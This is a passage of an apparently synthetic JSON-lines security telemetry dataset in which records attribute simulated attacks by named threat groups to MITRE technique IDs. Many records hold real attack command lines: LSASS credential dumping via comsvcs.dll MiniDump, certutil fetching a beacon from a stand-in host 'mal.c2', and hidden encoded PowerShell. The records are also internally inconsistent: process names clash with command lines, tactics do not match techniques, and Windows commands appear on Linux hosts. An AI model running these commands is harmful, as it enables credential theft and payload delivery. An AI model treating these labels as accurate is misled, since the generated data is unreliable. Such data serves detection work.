beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-12-06T05:25:02.000Z","user":{"name":"i-8r4dq9627ge7","sid":"S-1-5-21-655003570-391467027-4737"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Discovery"],"technique_id":"T1003.001"},"event_id":"evt_apt41_20260927T060415000Z_0017849","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.19.144.56","name":"APP-WEB-9URYFYQFBH","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17849APT41T1003.001"},"network":{"domain":"github.com","dst_ip":"1.35.217.246","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3074 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-01-06T07:41:27.000Z","user":{"name":"i-d0j75iohxyjv","sid":"S-1-5-21-158482730-831506600-5541"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Collection","Credential Access"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20251101T134430000Z_0017851","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.42.100.97","name":"EC2-INST-DINHXBEYIS","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17851APT41T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.57.147.223","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-05-06T14:42:01.000Z","user":{"name":"CORP\\tzb1vx6zc40w","sid":"S-1-5-21-224272366-131076067-1573"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Command and Control"],"technique_id":"T1059.001"},"event_id":"evt_volttyphoon_20260228T040207000Z_0017853","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.41.60.106","name":"DB-ORACLE-8MASPG3KZ5","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17853Volt TyphoonT1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.124.28.131","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3958 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-08-24T02:51:24.000Z","user":{"name":"svc_c8hc8wvr0fzt","sid":"S-1-5-21-578714211-449865560-9661"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Initial Access","Persistence"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20250808T072010000Z_0017855","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.181.127.228","name":"IAM-ROLE-KFQAU6BB6H","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17855Scattered SpiderT1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.163.233.160","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2482 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-01-04T17:43:15.000Z","user":{"name":"i-kqdigxsk8mth","sid":"S-1-5-21-227124344-178276198-4175"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Lateral Movement","Collection","Exfiltration"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20250512T025532000Z_0017857","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.135.5.192","name":"IAM-ROLE-W9QOMMAM4Q","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17857Volt TyphoonT1021.006"},"network":{"domain":"github.com","dst_ip":"1.152.94.102","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-03-06T17:09:16.000Z","user":{"name":"azuread\\g0o5uigxj7wr","sid":"S-1-5-21-894430863-857354211-5712"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Collection"],"technique_id":"T1059.001"},"event_id":"evt_lapsus_20260105T062224000Z_0017859","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.206.65.39","name":"APP-WEB-NHVYNMWROS","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17859Lapsus$T1059.001"},"network":{"domain":"github.com","dst_ip":"1.54.197.49","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3338 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-11-06T22:02:23.000Z","user":{"name":"svc_ybisbeynkwto","sid":"S-1-5-21-275010148-207774952-3951"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Privilege Escalation"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20250518T215626000Z_0017861","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.42.236.242","name":"IAM-ROLE-FSG0LW7W51","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17861APT29T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.72.38.247","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"cmstp.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-07-12T23:32:22.000Z","user":{"name":"svc_uidhfs1ajzi9","sid":"S-1-5-21-473457770-499221798-7247"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Execution","Collection"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20261018T110500000Z_0017863","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.249.57.233","name":"IAM-ROLE-0TVKEW4ZYB","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17863UNC4841T1021.006"},"network":{"domain":"github.com","dst_ip":"1.119.16.80","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-12-18T00:18:52.000Z","user":{"name":"CORP\\rpyd4k3hwq5v","sid":"S-1-5-21-154701518-996638141-6505"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Collection"],"technique_id":"T1531"},"event_id":"evt_mustangpanda_20250223T164631000Z_0017865","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.73.234.62","name":"APP-WEB-EFPQCNZ8P8","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17865Mustang PandaT1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.176.74.96","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-05-17T07:36:44.000Z","user":{"name":"svc_e735j32ag8p5","sid":"S-1-5-21-740980086-730148724-5232"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Command and Control"],"technique_id":"T1098.004"},"event_id":"evt_unc4841_20260331T131338000Z_0017867","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.189.244.43","name":"DB-ORACLE-Q1ZZ3LTA2A","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17867UNC4841T1098.004"},"network":{"domain":"github.com","dst_ip":"1.69.21.68","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-05-19T23:58:37.000Z","user":{"name":"i-jnp9j23rdfgn","sid":"S-1-5-21-882808397-122123782-1013"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Impact","Discovery","Collection"],"technique_id":"T1531"},"event_id":"evt_mustangpanda_20250414T202059000Z_0017869","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.191.56.79","name":"DB-ORACLE-RDAK9A5QDE","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17869Mustang PandaT1531"},"network":{"domain":"github.com","dst_ip":"1.15.32.41","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-07-18T06:10:26.000Z","user":{"name":"azuread\\twwm94w8z2dz","sid":"S-1-5-21-551697672-172491014-7134"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Privilege Escalation","Defense Evasion"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20250926T092329000Z_0017871","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["WMI","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.140.162.40","name":"DB-ORACLE-3TFVRRBIMV","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17871Scattered SpiderT1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.61.190.248","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-12-26T23:18:28.000Z","user":{"name":"arn:aws:iam::jbq4vqpv08ab","sid":"S-1-5-21-107037848-962697629-3185"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement","Execution"],"technique_id":"T1570"},"event_id":"evt_mustangpanda_20260525T232954000Z_0017873","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.47.76.219","name":"DB-ORACLE-GO3YUHPYZK","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17873Mustang PandaT1570"},"network":{"domain":"github.com","dst_ip":"1.122.146.4","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1868 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-04-14T02:12:30.000Z","user":{"name":"i-cscndheoaqre","sid":"S-1-5-21-758795151-992841470-9949"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Initial Access","Discovery","Credential Access"],"technique_id":"T1570"},"event_id":"evt_apt41_20260401T101747000Z_0017875","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.234.190.220","name":"DB-ORACLE-ADDZZ89XVY","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17875APT41T1570"},"network":{"domain":"github.com","dst_ip":"1.126.47.87","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"rundll32.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-07-07T06:14:05.000Z","user":{"name":"i-wvnhseqmibl3","sid":"S-1-5-21-276087919-660810248-4546"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Lateral Movement","Reconnaissance","Credential Access"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20251225T061437000Z_0017877","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.88.204.105","name":"APP-WEB-0QN5MLF0PS","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17877Volt TyphoonT1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.164.198.197","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3162 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-11-15T04:58:58.000Z","user":{"name":"azuread\\pk9yrq7s4z66","sid":"S-1-5-21-960014518-280538065-9035"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Command and Control","Execution","Credential Access"],"technique_id":"T1021.006"},"event_id":"evt_apt41_20260723T033552000Z_0017879","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.89.205.232","name":"DB-ORACLE-S2KS2Y0UI6","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17879APT41T1021.006"},"network":{"domain":"github.com","dst_ip":"1.153.7.196","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-09-27T00:14:11.000Z","user":{"name":"CORP\\a9wnk2ayyfv0","sid":"S-1-5-21-713497866-930616034-3274"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Persistence"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20260406T131518000Z_0017881","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.165.227.38","name":"IAM-ROLE-GEWO18HV4B","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17881Scattered SpiderT1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.87.161.88","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2398 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-07-06T13:01:24.000Z","user":{"name":"CORP\\6y7v6ve2s1yb","sid":"S-1-5-21-850969290-203591551-4107"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Privilege Escalation","Command and Control","Discovery"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20261123T005334000Z_0017883","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.184.145.86","name":"EC2-INST-RB17IGV0X4","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17883UNC4841T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.153.238.194","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1362 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-06-09T14:23:32.000Z","user":{"name":"i-k3zqtsq3xscz","sid":"S-1-5-21-924353910-954648121-9167"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Defense Evasion","Impact"],"technique_id":"T1098.004"},"event_id":"evt_unc4841_20260416T201424000Z_0017885","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.103.111.11","name":"DB-ORACLE-EHG512WYJD","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17885UNC4841T1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.159.1.64","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-11-21T17:30:16.000Z","user":{"name":"CORP\\y9ghav5xinbp","sid":"S-1-5-21-624942236-641363623-5463"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Discovery","Impact"],"technique_id":"T1059.001"},"event_id":"evt_apt41_20260922T200111000Z_0017887","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.11.23.114","name":"AZURE-VM-A7W5E27QFP","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17887APT41T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.119.152.221","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-01-29T00:32:30.000Z","user":{"name":"svc_w6k1nzs6g4xe","sid":"S-1-5-21-720594571-504683294-9522"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Privilege Escalation"],"technique_id":"T1059.001"},"event_id":"evt_scatteredspider_20260824T043327000Z_0017889","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.62.77.129","name":"IAM-ROLE-3HQBT64IYT","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17889Scattered SpiderT1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.50.163.31","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 689 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-05-07T03:41:40.000Z","user":{"name":"arn:aws:iam::bb74g5noothf","sid":"S-1-5-21-476760939-701578880-8029"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Exfiltration"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20251020T055501000Z_0017891","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.127.181.152","name":"IAM-ROLE-2WRBOTSS49","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17891Volt TyphoonT1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.119.227.18","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-11-02T13:58:42.000Z","user":{"name":"svc_gx5vchxvm1fd","sid":"S-1-5-21-182846162-725762028-4986"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Reconnaissance","Credential Access"],"technique_id":"T1566.001"},"event_id":"evt_volttyphoon_20260730T095413000Z_0017893","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.180.197.229","name":"WIN-FIN-SRV-NXQIRPBOLJ","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17893Volt TyphoonT1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.51.69.65","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-03-06T09:57:59.000Z","user":{"name":"azuread\\leojqqjqpv0w","sid":"S-1-5-21-733672293-216448198-3990"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Exfiltration","Defense Evasion"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20251006T201409000Z_0017895","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.199.151.254","name":"DB-ORACLE-Z565TRC8LU","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & 